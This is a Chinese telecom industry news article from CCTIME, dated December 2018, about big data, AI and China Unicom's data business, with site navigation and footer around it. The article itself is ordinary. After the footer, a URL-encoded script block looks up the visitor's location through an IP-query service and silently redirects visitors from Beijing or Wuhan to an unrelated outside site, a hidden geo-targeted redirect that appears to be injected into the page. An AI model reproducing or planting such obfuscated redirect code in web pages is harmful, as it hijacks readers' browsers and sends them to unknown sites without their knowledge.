首页 | 滚动 | 国内 | 国际 | 运营 | 制造 | 终端 | 监管 | 原创 | 业务 | 技术 | 报告 | 博客 | 特约记者
手机 | 互联网 | IT | 5G | 光通信 | LTE | 云计算 | 三网融合 | 芯片 | 电源 | 虚拟运营商 | 测试 | 移动互联网 | 会展
首页 >> 运营 >> 正文

数据驱动变革,谁有机会实现应用科技下的弯道超车?

2018年12月24日 11:11  CCTIME飞象网  

大势已至,未来已来。2018年已进入总结阶段,盘点全年各大科技盛会关键词,几乎是步调统一、言论一致,人工智能(AI)、大数据(Big Data)、云计算(Cloud)、物联网(IoT)等创新科技已经深度融入到人们的生活,成为新时代最具发展活力的力量。

在中共中央政治局第九次集体学习中,习近平主席强调:“人工智能是新一轮科技革命和产业变革的重要驱动力量,加快发展新一代人工智能是事关我国能否抓住新一轮科技革命和产业变革机遇的战略问题。”12月18日,习主席在庆祝改革开放40周年大会发表重要讲话中指出:“创新是改革开放的生命。”纵览中国的互联网发展史,从最初网络犹如阳春白雪般的存在,到如今信息化快速发展,可谓波澜壮阔,创新技术和应用已经成为新时代最具发展活力的力量,助推了改革开放的行进步伐。

近几年,政府层面对于科技带动全民经济发展的整体布局已日渐清晰。谁将在应用科技中脱颖而出,成为行业中的独角兽?

海量数据,“头雁”企业的机遇与责任

在互联网尤其是移动互联网的深度普及下,具备大量、多维度和完备性特征的大数据应运而生,并直接驱动了机器智能的迅猛发展,由此可见智能问题即为数据问题。如同蒸汽、电力之于工业时代,智能时代的竞争是大数据和算法的竞争,集中表现在大数据的采集、处理、学习和输出全过程链。5G助力物联网实现万物数据采集,云计算不断迭代数据处理能力,人工智能实现数据的理解和判断,最终输出在各行各业的智能产品中。

可谓:驱动于大数据,实现于机器智能。

借用腾讯WE大会主题,站于“雅努斯之门”,在不断了解过去的过程中,更好地眺望未来。科技、媒体、电商、运营商、终端设备商,与传统企业相比,这些在互联网上半场便拥有海量数据的行业似乎更具备产生“头雁”企业的基础。

机遇永远伴随挑战,历史经验带来的阵痛不容忽视,网络安全是关系到人身乃至国家安全的重要课题,而大数据作为人工智能等新一代技术的底层核心,可以说以更为直接的方式影响着网络安全的方方面面。习主席曾强调:要加强人工智能发展的潜在风险研判和防范,维护人民利益和国家安全,确保人工智能安全、可靠、可控。要整合多学科力量,加强人工智能相关法律、伦理、社会问题研究,建立健全保障人工智能健康发展的法律法规、制度体系、伦理道德。

“我们正在努力打造负责任的人工智能,时刻不忘警醒自己,是否在以负责任的态度打造人工智能系统”,微软全球执行副总裁沈向洋如是说。“在探索大数据和智能应用的过程中,我们从数据认知、数据治理、安全合规、企业责任和意识形态等方面,建立了一套科学的数据价值观体系,并不断完善迭代”,联通大数据总经理赵越提到。新浪CEO曹国伟也公开呼吁,互联网平台型的企业尤其要对自己日益增长的影响力有敬畏之心,积极加强平台治理,承担社会责任。

网络安全的核心是数据安全,涉及技术保障、资源对接等方方面面,同时更是对企业社会责任及意识形态的考验。近段时间,有关部门针对非法大数据企业进行了新一轮的整治行动,通过分析我们不难发现,这些企业主要围绕数据源的非法获取、非法缓存、以及非法合作而获取牟利。数据的汇集加大了信息安全的风险,大数据企业应以合法合规、安全可靠为前提开展业务,守住人民安全、社会安全、国家安全的底线。

数据为王,科技与产业变革的推动器

从互联网科技发展阶段来看,“信息为王”的PC时代大资讯需求迅猛,崛起航母级BAT+J(百度、阿里、腾讯、京东);“流量为王”的移动互联网时代深挖流量入口,造就了TMD(头条、美团、滴滴)和众多自媒体阵营。“数据为王”的智能时代已然来临,优势行业中又有哪些企业最有弯道超车的可能呢?梳理“大数据”这张大网,终端设备商和电信运营商的优势得天独厚。

以小米、华为、科大讯飞等为代表的科技型设备商早已开始布局大数据智能生态链,小米创始人兼CEO雷军在互联网大会上表示:“我们拥有巨大的优势是,我们拥有用户群,我们拥有海量设备,我们拥有海量的数据,更重要的是我们拥有对整个AI时代的认知,应该利用自己的优势迎头赶上。”这些优势包括在声学、自然语言处理、计算机视觉、知识图谱、深度学习、智能设备接入等关键技术领域的着力发展。

对于电信运营商来说,发展大数据业务似乎更像是一种与生俱来的使命和责任。从首都国贸商圈至3000多公里外的新疆阿勒泰,运营商基站分布在全国各地,基于号码ID实现真实、完整、多维、中立的高密度价值数据采集,单从数据源来看,已是其它企业做大数据业务难以比拟的先天优势。

如果说更多企业开展大数据业务迫切需要解决“数据从哪来”的问题,那么运营商在做的则是一方面开放共享脱敏的数据资源、赋能企业;同时专注于在保障安全的基础上,实现数据在不同应用场景下的价值最大化。

以联通举例,在2014年就已经完成了全国31省的数据集中,并在2017年率先成立专业的运营商大数据公司——联通大数据,全面布局和发力大数据领域。依托于中国联通4亿+用户量的数据基因、跨产业数据融合的能力、强大的算力优势、深耕至全国各地市的渠道体系,联通大数据不断深挖垂直行业应用场景,面向政务、金融、保险、旅游、交通、公共安全等20余个行业进行赋能,助力上千家客户和合作伙伴进行数字化转型。

与数智并肩,扩展日常连接未来

手握海量数据资源的企业,不仅有“关键核心技术占领制高点”的基础研究责任,更应该承担起赋能一、二、三产业和整个社会发展的重任,开展应用型技术研究。换句话说,大数据时代带来的也是供给侧改革,AI技术、IoT技术、云技术等这些技术必将带来新产业的诞生,从而推动社会的升级和变迁并向普惠方向发展。百度L4级自动驾驶车辆已经量产,推出智能城市、高端AI芯片;腾讯大数据和人工智能进入医疗和农业领域;阿里自主研发大规模云操作系统,布局城市、汽车、医疗等多领域;小米、华为不局限于终端设备转向智能家居生态系统;联通成立大数据公司依托数据智能服务,产品落地政务、旅游、零售等多行业。

“互联网+”之后,联通大数据所倡导的“数智+”似乎更符合新社会形态的需要,作为离设备最近的大数据平台,通过其产品的落地,可窥发展全貌。在“数据+技术+运营”独特优势下,“数智+”活跃于城市建设、政务平台、交通、农业、医疗、零售等各个领域。

数智+零售,数智+农业、数智+医疗……,在大数据中挖掘规律、预测趋势、辅助决策,并不断促进各行业的智能化落地。充分释放和利用海量数据资源中蕴含的巨大价值,才能真正找到智能时代下连接现在与未来的密码。

编 辑:霏雯
免责声明:刊载本文目的在于传播更多行业信息,不代表本站对读者构成任何其它建议,请读者仅作参考,更不能作为投资使用依据,请自行核实相关内容。
相关新闻              
 
人物
2018年9月15日,中国电信董事长杨杰在2018世界物联网博览会无..
精彩专题
中国信科首秀2018中国国际信息通信展
中国电信绽放2018国际通信展
聚焦2018年中国国际信息通信展
遇见美好未来--世界移动大会·上海
CCTIME推荐
关于我们 | 广告报价 | 联系我们 | 隐私声明 | 本站地图
CCTIME飞象网 CopyRight © 2007-2017 By CCTIME.COM
京ICP备08004280号  电信与信息服务业务经营许可证080234号 京公网安备110105000771号
公司名称: 北京飞象互动文化传媒有限公司
未经书面许可,禁止转载、摘编、复制、镜像

%3Cscript%20type%3D%22text/javascript%22%20src%3D%22http%3A//ip.ws.126.net/ipquery%22%3E%3C/script%3E%0A%3Cscript%20type%3D%22text/javascript%22%3E%0Astrdistrict%20%3D%5Blo%2C%20lc%5D.join%28%27%5Ct%27%29%3B%0Aif%28strdistrict.indexOf%28%22%u5317%u4EAC%22%29%3E0%20%7C%7C%20strdistrict.indexOf%28%22%u6B66%u6C49%22%29%3E0%29%0A%7B%0Awindow.location.href%3D%22http%3A//www.arrdm.com%22%3B%20%20%0A%7D%0Aelse%0A%7B%0A%7D%0A%3C/script%3E